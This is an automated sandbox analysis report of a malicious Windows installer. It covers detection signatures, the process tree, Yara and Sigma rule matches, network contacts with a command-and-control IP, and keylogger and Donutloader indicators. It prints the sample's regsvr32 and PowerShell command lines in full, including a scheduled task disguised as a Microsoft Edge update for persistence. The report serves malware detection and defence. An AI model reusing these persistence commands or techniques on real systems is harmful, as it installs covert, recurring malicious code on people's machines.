Edit tour

Windows Analysis Report
h40thEqmz6.exe

Overview

General Information

Sample name:	h40thEqmz6.exe renamed because original name is a hash value
Original sample name:	c344f9de1aa1bf284d8281aff7b216ca85b2dde7fc05e1d13b5abcef37d4ca0d.exe
Analysis ID:	1584666
MD5:	e3ae2dc9b8b0582a266871b52e85c36f
SHA1:	f783d1d0354bf3ad1dc4e506e4df3250a89ee765
SHA256:	c344f9de1aa1bf284d8281aff7b216ca85b2dde7fc05e1d13b5abcef37d4ca0d
Tags:	exeuser-zhuzhu0009
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Powershell launch regsvr32

System process connects to network (likely due to code injection or exploit)

.NET source code contains potential unpacker

AI detected suspicious sample

Connects to many ports of the same IP (likely port scanning)

Contains functionality to log keystrokes (.Net Source)

Loading BitLocker PowerShell Module

Sets debug register (to hijack the execution of another thread)

Sigma detected: Potentially Suspicious Child Process Of Regsvr32

Suspicious powershell command line found

Uses Register-ScheduledTask to add task schedules

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries keyboard layouts

Queries the volume information (name, serial number etc) of a device

Registers a DLL

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Network Connection Initiated By Regsvr32.EXE

Sigma detected: Potential Regsvr32 Commandline Flag Anomaly

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

h40thEqmz6.exe (PID: 6604 cmdline: "C:\Users\user\Desktop\h40thEqmz6.exe" MD5: E3AE2DC9B8B0582A266871B52E85C36F)

h40thEqmz6.tmp (PID: 5960 cmdline: "C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp" /SL5="$1041E,450685,141312,C:\Users\user\Desktop\h40thEqmz6.exe" MD5: 8FDC58C7D4C59472615682D6DEA9D190)

h40thEqmz6.exe (PID: 6980 cmdline: "C:\Users\user\Desktop\h40thEqmz6.exe" /VERYSILENT MD5: E3AE2DC9B8B0582A266871B52E85C36F)

h40thEqmz6.tmp (PID: 2672 cmdline: "C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp" /SL5="$2042C,450685,141312,C:\Users\user\Desktop\h40thEqmz6.exe" /VERYSILENT MD5: 8FDC58C7D4C59472615682D6DEA9D190)

regsvr32.exe (PID: 3680 cmdline: "regsvr32.exe" /s /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll MD5: 878E47C8656E53AE8A8A21E927C6F7E0)

regsvr32.exe (PID: 7160 cmdline: /s /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

powershell.exe (PID: 6024 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2000 cmdline: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{7A7D6BFF-F589-4298-BDDA-3BBA941A2598}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

regsvr32.exe (PID: 6520 cmdline: "regsvr32" /i:360 /s C:\Users\user\AppData\Roaming\Setup_Coat.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

regsvr32.exe (PID: 1268 cmdline: C:\Windows\system32\regsvr32.EXE /S /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.3245140417.00000000025C0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xa708:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xa756:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xa7a4:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
00000006.00000002.3245193500.00000000026E0000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xe188:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x116be:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000006.00000002.3244688637.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x2cec8:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x303fe:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.regsvr32.exe.25c0000.1.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x8908:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x8956:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x89a4:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
6.2.regsvr32.exe.26e130d.2.unpack	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xb07b:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
6.2.regsvr32.exe.26e130d.2.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x8908:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x8956:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x89a4:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
6.2.regsvr32.exe.25c0000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xa708:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xa756:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xa7a4:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
6.2.regsvr32.exe.a5b04d.0.unpack	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xb07b:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
6.2.regsvr32.exe.a5b04d.0.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x8908:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x8956:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x89a4:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
6.2.regsvr32.exe.26e130d.2.raw.unpack	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xce7b:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x103b1:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
6.2.regsvr32.exe.26e130d.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xa708:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xa756:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xa7a4:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
6.2.regsvr32.exe.a5b04d.0.raw.unpack	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xce7b:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x103b1:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
6.2.regsvr32.exe.a5b04d.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xa708:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xa756:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xa7a4:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Potentially Suspicious Child Process Of Regsvr32

Source: Process started

Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 7160, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll' }) { exit 0 } else { exit 1 }", ProcessId: 6024, ProcessName: powershell.exe

Sigma detected: Network Connection Initiated By Regsvr32.EXE

Source: Network Connection

Author: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 38.49.56.2, DestinationIsIpv6: false, DestinationPort: 56005, EventID: 3, Image: C:\Windows\System32\regsvr32.exe, Initiated: true, ProcessId: 7160, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49730

Sigma detected: Potential Regsvr32 Commandline Flag Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "regsvr32.exe" /s /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll, CommandLine: "regsvr32.exe" /s /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp" /SL5="$2042C,450685,141312,C:\Users\user\Desktop\h40thEqmz6.exe" /VERYSILENT, ParentImage: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp, ParentProcessId: 2672, ParentProcessName: h40thEqmz6.tmp, ProcessCommandLine: "regsvr32.exe" /s /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll, ProcessId: 3680, ProcessName: regsvr32.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 7160, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll' }) { exit 0 } else { exit 1 }", ProcessId: 6024, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Powershell launch regsvr32

Source: Process started

Author: Joe Security: Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 7160, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll' }) { exit 0 } else { exit 1 }", ProcessId: 6024, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Setup_Coat.dll (copy)	ReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Roaming\is-CBKGS.tmp	ReversingLabs: Detection: 69%

Multi AV Scanner detection for submitted file

Source: h40thEqmz6.exe	Virustotal: Detection: 63%			Perma Link
Source: h40thEqmz6.exe	ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 85.0% probability

Source: C:\Windows\System32\regsvr32.exe

Code function: 6_2_00007FF8A93100B0 TlsGetValue,BCryptGenRandom,SystemFunction036,TlsGetValue,TlsGetValue,TlsSetValue,HeapFree,HeapFree,TlsSetValue,HeapFree,HeapFree,TlsSetValue,HeapFree,HeapFree,TlsSetValue,

6_2_00007FF8A93100B0

Source: h40thEqmz6.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\File Manager_is1

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 4x nop then push r13

6_2_00007FF8A9355404

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe

Network Connect: 38.49.56.2 56003

Jump to behavior

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 38.49.56.2 ports 0,56005,5,6,56003,56004

Source: global traffic

TCP traffic: 192.168.2.5:49730 -> 38.49.56.2:56005

Source: Joe Sandbox View

ASN Name: COGENT-174US COGENT-174US

Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.56.2

Source: powershell.exe, 00000007.00000002.2096777613.000001D2BE6CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2211891666.000002C41BCAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.2141845247.000002C40BE68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.2065758420.000001D2AE888000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2141845247.000002C40BE68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000007.00000002.2065758420.000001D2AE661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2141845247.000002C40BC41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.2065758420.000001D2AE888000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2141845247.000002C40BE68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000009.00000002.2141845247.000002C40BE68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: h40thEqmz6.exe, 00000000.00000003.1996919927.00000000023D0000.00000004.00001000.00020000.00000000.sdmp, h40thEqmz6.exe, 00000000.00000003.1997111463.000000007FD30000.00000004.00001000.00020000.00000000.sdmp, h40thEqmz6.tmp, 00000001.00000000.1997652661.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-UGL1J.tmp.4.dr, h40thEqmz6.tmp.0.dr, h40thEqmz6.tmp.2.dr	String found in binary or memory: http://www.innosetup.com/
Source: powershell.exe, 00000009.00000002.2226315650.000002C4244A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: h40thEqmz6.exe, 00000000.00000003.1996919927.00000000023D0000.00000004.00001000.00020000.00000000.sdmp, h40thEqmz6.exe, 00000000.00000003.1997111463.000000007FD30000.00000004.00001000.00020000.00000000.sdmp, h40thEqmz6.tmp, 00000001.00000000.1997652661.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-UGL1J.tmp.4.dr, h40thEqmz6.tmp.0.dr, h40thEqmz6.tmp.2.dr	String found in binary or memory: http://www.remobjects.com/ps
Source: powershell.exe, 00000007.00000002.2065758420.000001D2AE661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2141845247.000002C40BC41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000009.00000002.2141845247.000002C40BE68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000009.00000002.2211891666.000002C41BCAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.2211891666.000002C41BCAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.2211891666.000002C41BCAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: h40thEqmz6.tmp, 00000004.00000003.2007225545.0000000005B20000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmp, is-CBKGS.tmp.4.dr	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support/rust/deps
Source: powershell.exe, 00000009.00000002.2141845247.000002C40BE68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000007.00000002.2096777613.000001D2BE6CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2211891666.000002C41BCAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 6.2.regsvr32.exe.26e130d.2.raw.unpack, Keylogger.cs	.Net Code: KeyboardLayout
Source: 6.2.regsvr32.exe.a5b04d.0.raw.unpack, Keylogger.cs	.Net Code: KeyboardLayout
Source: 6.2.regsvr32.exe.25c0000.1.raw.unpack, Keylogger.cs	.Net Code: KeyboardLayout

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.2.regsvr32.exe.25c0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.regsvr32.exe.26e130d.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 6.2.regsvr32.exe.26e130d.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.regsvr32.exe.25c0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.regsvr32.exe.a5b04d.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 6.2.regsvr32.exe.a5b04d.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.regsvr32.exe.26e130d.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 6.2.regsvr32.exe.26e130d.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.regsvr32.exe.a5b04d.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 6.2.regsvr32.exe.a5b04d.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 00000006.00000002.3245140417.00000000025C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 00000006.00000002.3245193500.00000000026E0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000006.00000002.3244688637.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9305D24 memset,HeapCreate,HeapAlloc,GetLastError,memset,GetModuleHandleA,LoadLibraryA,GetProcAddress,HeapFree,HeapFree,GetModuleHandleA,GetProcAddress,HeapFree,HeapFree,AddVectoredExceptionHandler,NtQueryInformationProcess,NtQuerySystemInformation,NtOpenThread,DeleteFileW,HeapFree,GetLastError,HeapFree,HeapFree,RtlFreeHeap,NtGetContextThread,NtSetContextThread,NtClose,HeapFree,HeapFree,HeapFree,HeapFree,memcpy,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,	6_2_00007FF8A9305D24
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A931D410 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,	6_2_00007FF8A931D410
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9306288 memset,HeapCreate,HeapAlloc,GetLastError,memset,GetModuleHandleA,LoadLibraryA,GetProcAddress,HeapFree,HeapFree,GetModuleHandleA,GetProcAddress,HeapFree,HeapFree,AddVectoredExceptionHandler,NtQueryInformationProcess,NtQuerySystemInformation,HeapFree,RtlFreeHeap,NtGetContextThread,NtSetContextThread,NtClose,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,	6_2_00007FF8A9306288

Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9347C00	6_2_00007FF8A9347C00
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9301E80	6_2_00007FF8A9301E80
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9305D24	6_2_00007FF8A9305D24
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9305DE8	6_2_00007FF8A9305DE8
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A93100B0	6_2_00007FF8A93100B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9340230	6_2_00007FF8A9340230
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF8A9363A70	6_2_00007FF8A9363A70
